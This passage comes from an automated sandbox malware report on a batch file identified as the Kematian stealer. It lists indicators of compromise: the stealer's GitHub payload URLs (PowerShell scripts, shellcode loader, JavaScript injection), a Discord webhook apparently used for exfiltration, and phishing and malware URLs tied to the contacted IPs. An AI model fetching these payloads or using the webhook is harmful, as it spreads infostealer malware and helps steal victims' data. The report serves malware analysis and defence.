              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000014.00000002.1765711117.000001EC46CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE02764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CA991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85A781000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://discord.Xpowershell.exe, 00000014.00000002.1765711117.000001EC470EC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC48591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1947001037.0000029E4A244000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3BB45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAB46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC350000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000028.00000002.2928167979.0000017EE8586000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000024.00000002.1885695376.0000029E3AF3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A3F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://go.micropowershell.exe, 00000014.00000002.1765711117.000001EC47B46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3B7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBAED000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1powershell.exe, 00000014.00000002.1784812345.000001EC5EF50000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://contoso.com/Iconpowershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000024.00000002.1885695376.0000029E3B7FE000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://raw.githubusercontpowershell.exe, 00000014.00000002.1765711117.000001EC47FFC000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://www.microsoft.powershell.exe, 00000024.00000002.1956228597.0000029E526AB000.00000004.00000020.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2331375157.000000C0000B6000.00000004.00001000.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.cloudflare.compowershell.exe, 00000028.00000002.2928167979.0000017EE82E5000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834powershell.exe, 00000030.00000002.2355424923.000002A85AB61000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://crl.mhpowershell.exe, 00000028.00000002.2916812846.0000017E8045A000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/TheWoverpowershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxpowershell.exe, 00000014.00000002.1765375407.000001EC44F5E000.00000004.00000020.00020000.00000000.sdmptrue
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/kematian_shellcode.ps1powershell.exe, 00000030.00000002.2354204002.000002A858DB6000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1powershell.exe, 0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://objects.githubusercontent.compowershell.exe, 00000030.00000002.2355424923.000002A85AB61000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.githubusercontent.compowershell.exe, 00000014.00000002.1765711117.000001EC47FFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC46ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBFC0000.00000004.00000800.00020000.00000000.sdmptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000024.00000002.1885695376.0000029E3AF3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A3F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://raw.githubusercontent.compowershell.exe, 00000014.00000002.1765711117.000001EC48293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBFD8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aka.ms/pscore68powershell.exe, 00000014.00000002.1765711117.000001EC46CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE0272A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE0273D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CA991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85A781000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Somali-Devs/Kematian-Stealerpowershell.exe, 00000028.00000002.2928167979.0000017EE866A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EEA035000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE97DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE8E37000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.jspowershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://oneget.orgpowershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://discord.com/api/webhooks/1241088645289480213/opjqqaosqwrak2j4o5xsc-dugkqcfdvi3tjvq0bt27lstvxpowershell.exe, 00000014.00000002.1784812345.000001EC5EF50000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    208.95.112.1
                    		ip-api.comUnited States
                    		53334TUT-ASUStrue
                    140.82.121.3
                    		github.comUnited States
                    		36459GITHUBUStrue
                    185.199.110.133
                    		raw.githubusercontent.comNetherlands
                    		54113FASTLYUStrue
                    104.16.123.96
                    		www.cloudflare.comUnited States
                    		13335CLOUDFLARENETUSfalse
                    185.199.111.133
                    		objects.githubusercontent.comNetherlands
                    		54113FASTLYUSfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1467953
                    Start date and time:2024-07-05 06:25:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 31s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:50
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Sample name:pirates.bat
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winBAT@69/65@7/5
                    EGA Information:
                    • Successful, ratio: 20%
                    HCA Information:
                    • Successful, ratio: 64%
                    • Number of executed functions: 21
                    • Number of non-executed functions: 4
                    Cookbook Comments:
                    • Found application associated with file extension: .bat

                    Warnings

                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 7536 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7624 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7840 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 8132 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtNotifyChangeKey calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    00:26:04API Interceptor1247500x Sleep call for process: powershell.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    208.95.112.1Nuevo orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    bL1WCnC18s.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    A1YOFV1abV.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    main.ps1Get hashmaliciousUnknownBrowse
                    • ip-api.com/json
                    main.ps1Get hashmaliciousUnknownBrowse
                    • ip-api.com/json
                    Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    20240704-455.exeGet hashmaliciousGuLoaderBrowse
                    • ip-api.com/line/?fields=hosting
                    140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                    • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                    firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                    • github.com/john-xor/temp/blob/main/index.html?raw=true
                    0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                    • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                    MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                    • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                    RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                    • github.com/ssbb36/stv/raw/main/5.mp3
                    185.199.110.133https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                      thegreatestexecutor.batGet hashmaliciousUnknownBrowse
                        thegreatestexecutor.batGet hashmaliciousUnknownBrowse
                          https://maknastudio.com/pkyosGet hashmaliciousHTMLPhisherBrowse
                            https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                              https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                                https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                                  http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CuPML-2Fk7hkFuRgQZCNn13gFjxpvaK7BszvLf1FNgQSAGEcVOyFo5OkKyCTWVX8CFkHH2058S5Ahgs6702chswQ27i8fTIQhwmMoXYoEJ6NorF1VpAe0oJx35gDOEfSC0fALEr8V3cxNwqqHdyN8bubmjrpvt-2BbFbnZ-2FstXl8vxTAGFM6mTwmzfEL-2B-2BGu2lufzB8M21afC0TTeqSa7QFFyNA-3D-3DHBPv_PfC-2BSFtj-2BSSQFBPv0NgAOXDpcsq6LADHKWdyLdLAzrKwVahhFR76hhions4TwBL9F6a4eQ738jeLIeY9r1OOXohTZTeZE0n2g2t6fycMpA0TJOA8sXK8mZcOXs-2BnNqbr4W7O00eI9WZrnuIrYT3RIDO-2BEHvZtO2YjJnjDLiBUb-2B7QOSPTNUmcSEPbCN9-2Bq0u5dYWTd9AfzNX553r2GVUOxBO0VYIry3r2htr0J03Czo-3DGet hashmaliciousHTMLPhisherBrowse
                                    https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=AwsuihGet hashmaliciousHTMLPhisherBrowse
                                      http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDefjjvAc1VCRhzhBKQTVpjzhejQ8Rhu1zO1vWGAUfUeULJrKwFSbIOyWIUfIv-2Flo3yTYESP-2B78w2V31KWz3gTVG4x9fJGaMxyv5FQX0-2FC02SNh0q62WGV8moxgoMPN13ug-3D-3D0M2T_RK3E7lcHJh6RzNRog0V2Ww4F1i1LQS7pYYmvozE9BtFWFH8CBc2C7lCJRjsdH3VwNbJDjo91Q5gKMT9cCcdXw8AkweIV-2FNLnytbk6yO5x98zOjWQvldOWLzS2kOJk-2Bc9a9xwBmgqVDiuxw1Lx4HAzZ-2Bjhc2IjRsVwgsa2WyKs6mVKScqAKEYCpz9uhwD3RMPm3P4ijESTEtLH2hoAVbwO9XnUT-2BT6XJFuujR9hf41ZQ-3DGet hashmaliciousHTMLPhisherBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        raw.githubusercontent.commain.ps1Get hashmaliciousUnknownBrowse
                                        • 185.199.111.133
                                        main.ps1Get hashmaliciousUnknownBrowse
                                        • 185.199.109.133
                                        SecuriteInfo.com.W64.MSIL_Rozena.H.gen.Eldorado.13862.32197.exeGet hashmaliciousUnknownBrowse
                                        • 185.199.111.133
                                        SecuriteInfo.com.W64.MSIL_Rozena.H.gen.Eldorado.13862.32197.exeGet hashmaliciousUnknownBrowse
                                        • 185.199.109.133
                                        thegreatestexecutor.batGet hashmaliciousUnknownBrowse
                                        • 185.199.110.133
                                        thegreatestexecutor.batGet hashmaliciousUnknownBrowse
                                        • 185.199.109.133
                                        https://ns43q4.csb.app/Get hashmaliciousUnknownBrowse
                                        • 185.199.109.133
                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                        • 185.199.109.133
                                        Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                        • 185.199.109.133
                                        https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1Get hashmaliciousUnknownBrowse
                                        • 185.199.109.133
                                        ip-api.comNuevo orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        bL1WCnC18s.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        A1YOFV1abV.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        main.ps1Get hashmaliciousUnknownBrowse
                                        • 208.95.112.1
                                        main.ps1Get hashmaliciousUnknownBrowse
                                        • 208.95.112.1
                                        Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        20240704-455.exeGet hashmaliciousGuLoaderBrowse
                                        • 208.95.112.1
                                        github.comSecuriteInfo.com.FileRepMalware.1111.23697.exeGet hashmaliciousUnknownBrowse
                                        • 140.82.121.3
                                        https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6Get hashmaliciousHTMLPhisherBrowse
                                        • 140.82.121.4
                                        https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                        • 140.82.121.3
                                        http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.comGet hashmaliciousHTMLPhisherBrowse
                                        • 140.82.121.4
                                        SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exeGet hashmaliciousRUSTDESKBrowse
                                        • 140.82.121.3
                                        main.ps1Get hashmaliciousUnknownBrowse
                                        • 140.82.114.4
                                        SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exeGet hashmaliciousRUSTDESKBrowse
                                        • 140.82.121.4
                                        kematian_shellcode.ps1Get hashmaliciousUnknownBrowse
                                        • 140.82.121.3
                                        main.ps1Get hashmaliciousUnknownBrowse
                                        • 140.82.121.3
                                        update23.batGet hashmaliciousBraodoBrowse
                                        • 140.82.121.4
                                        www.cloudflare.commain.ps1Get hashmaliciousUnknownBrowse
                                        • 104.16.123.96
                                        https://cdoiq2024.org/events/session-13-e/Get hashmaliciousUnknownBrowse
                                        • 104.16.123.96
                                        main.ps1Get hashmaliciousUnknownBrowse
                                        • 104.16.123.96
                                        thegreatestexecutor.batGet hashmaliciousUnknownBrowse
                                        • 104.16.123.96
                                        thegreatestexecutor.batGet hashmaliciousUnknownBrowse
                                        • 104.16.123.96
                                        fart.exeGet hashmaliciousAsyncRAT, DcRat, Quasar, XWormBrowse
                                        • 104.16.123.96
                                        https://bafybeicl3sruyvjs6is67yed47chltq63n7qdv67sjo4yupnqu6bmy5uka.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                        • 104.16.123.96
                                        http://104.21.19.145Get hashmaliciousUnknownBrowse
                                        • 104.16.124.96
                                        http://telegravm.work/Get hashmaliciousTelegram PhisherBrowse
                                        • 104.16.124.96
                                        http://telegrram.work/Get hashmaliciousTelegram PhisherBrowse
                                        • 104.16.123.96

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        FASTLYUShttps://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AW0S.sdscondo.com/index.xml%23?email=cGV0ZXIuYnJvd24yM0Bxci5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
                                        • 151.101.130.137
                                        https://metamesklogni.webflow.io/Get hashmaliciousUnknownBrowse
                                        • 151.101.2.188
                                        http://cacahs.fdavm.com/Get hashmaliciousUnknownBrowse
                                        • 151.101.65.229
                                        http://mysterymint-s10.vercel.app/Get hashmaliciousUnknownBrowse
                                        • 185.199.109.133
                                        https://metaioseklcogin.webflow.io/Get hashmaliciousUnknownBrowse
                                        • 151.101.2.188
                                        https://pub-fb608504b57048a1b1ca54c74dbf132d.r2.dev/ront.html?ccsendGet hashmaliciousHTMLPhisherBrowse
                                        • 199.232.192.193
                                        http://diffusion-florentine-facilitated.netlify.app/form.htmlGet hashmaliciousUnknownBrowse
                                        • 151.101.129.229
                                        https://reg1a-g4ad23-269fe50-lqng5s.netlify.app/dev.html/Get hashmaliciousUnknownBrowse
                                        • 151.101.65.229
                                        https://www.google.com/url?q=https://authitca-adobue-sign.us-ord-1.linodeobjects.com/apts.html&sa=D&source=editors&ust=1720118061448441&usg=AOvVaw1WUHTIwDQHQCe4Um2Fp0tGGet hashmaliciousHTMLPhisherBrowse
                                        • 151.101.130.137
                                        xJwSq336bs.pdfGet hashmaliciousUnknownBrowse
                                        • 151.101.66.137
                                        TUT-ASUSNuevo orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        bL1WCnC18s.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
